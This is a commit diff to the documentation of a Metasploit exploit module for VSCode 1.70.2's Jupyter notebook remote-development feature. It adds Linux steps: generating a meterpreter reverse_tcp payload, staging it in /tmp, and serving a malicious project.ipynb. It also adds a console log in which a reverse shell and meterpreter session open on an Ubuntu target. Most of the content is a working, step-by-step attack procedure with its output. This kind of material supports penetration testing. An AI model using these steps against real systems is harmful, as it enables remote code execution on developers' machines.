Add Linux compatibility
This commit is contained in:
Jack Heysel
@@ -7,9 +7,9 @@ Each of these new windows can then execute arbitrary code at startup.
|
||||
|
||||
During testing, the first open of the Jupyter notebook resulted in pop-ups
|
||||
displaying errors of unable to find the payload exe file. The second attempt
|
||||
at opening the Jupyter notebook would result in successful exeuction.
|
||||
at opening the Jupyter notebook would result in successful execution.
|
||||
|
||||
Successfully tested against VSCode 1.70.2 on Windows 10.
|
||||
Successfully tested against VSCode 1.70.2 on Windows 10 and Ubuntu 22.04.
|
||||
|
||||
### Install
|
||||
|
||||
@@ -22,6 +22,7 @@ https://update.code.visualstudio.com/1.70.2/linux-deb-x64/stable
|
||||
|
||||
## Verification Steps
|
||||
|
||||
### Windows
|
||||
1. Install the application
|
||||
1. Start msfconsole
|
||||
1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec`
|
||||
@@ -31,6 +32,24 @@ https://update.code.visualstudio.com/1.70.2/linux-deb-x64/stable
|
||||
1. After the pop-up errors, open the file again.
|
||||
1. You should get a shell.
|
||||
|
||||
### Linux
|
||||
1. Install the application
|
||||
1. Start msfconsole
|
||||
1. Do: `use linux/x64/meterpreter/reverse_tcp`
|
||||
1. Do: `set lhost [ip]` and `set lport [port]`
|
||||
1. Do: `geneate -o shell.sh -f elf`
|
||||
1. Copy the payload `shell.sh` to `/tmp/` on the target and run `chmod +x /tmp/shell.sh`
|
||||
1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec`
|
||||
1. Do: `set target 1 `
|
||||
1. Do: `set lhost [ip]` and `set lport [port]` - be sure to set these to the same values as in the previous step
|
||||
1. Do: `set FETCH_WRITABLE_DIR /tmp/`
|
||||
1. Do: `set PAYLOAD_FILENAME shell.sh`
|
||||
1. Do: `run`
|
||||
1. Copy the ipynd payload file to the target machine.
|
||||
1. In VSCode, open the URL (File -> Open -> project.ipynb)
|
||||
1. After the pop-up errors, open the file again.
|
||||
1. You should get a shell.
|
||||
|
||||
## Options
|
||||
|
||||
## Scenarios
|
||||
@@ -89,3 +108,41 @@ x64
|
||||
|
||||
C:\Users\h00die>
|
||||
```
|
||||
|
||||
### VSCode 1.70.2 on Linux
|
||||
|
||||
```
|
||||
msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.199.1:4444
|
||||
[*] Starting up web service...
|
||||
[*] Using URL: http://172.16.199.1:8090/project.ipynb
|
||||
[*] Sent project.ipynb to 172.16.199.131
|
||||
[*] Sending stage (3045380 bytes) to 172.16.199.131
|
||||
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:60298) at 2024-05-13 09:56:36 -0700
|
||||
|
||||
^C[-] Exploit failed [user-interrupt]: Interrupt
|
||||
[*] Server stopped.
|
||||
[-] run: Interrupted
|
||||
msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -l
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Name Type Information Connection
|
||||
-- ---- ---- ----------- ----------
|
||||
3 meterpreter x64/linux msfuser @ 172.16.199.131 172.16.199.1:4444 -> 172.16.199.131:60298 (172.16.199
|
||||
|
||||
msf6 exploit(multi/misc/vscode_ipynb_remote_dev_exec) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: msfuser
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.16.199.131
|
||||
OS : Ubuntu 22.04 (Linux 6.2.0-35-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user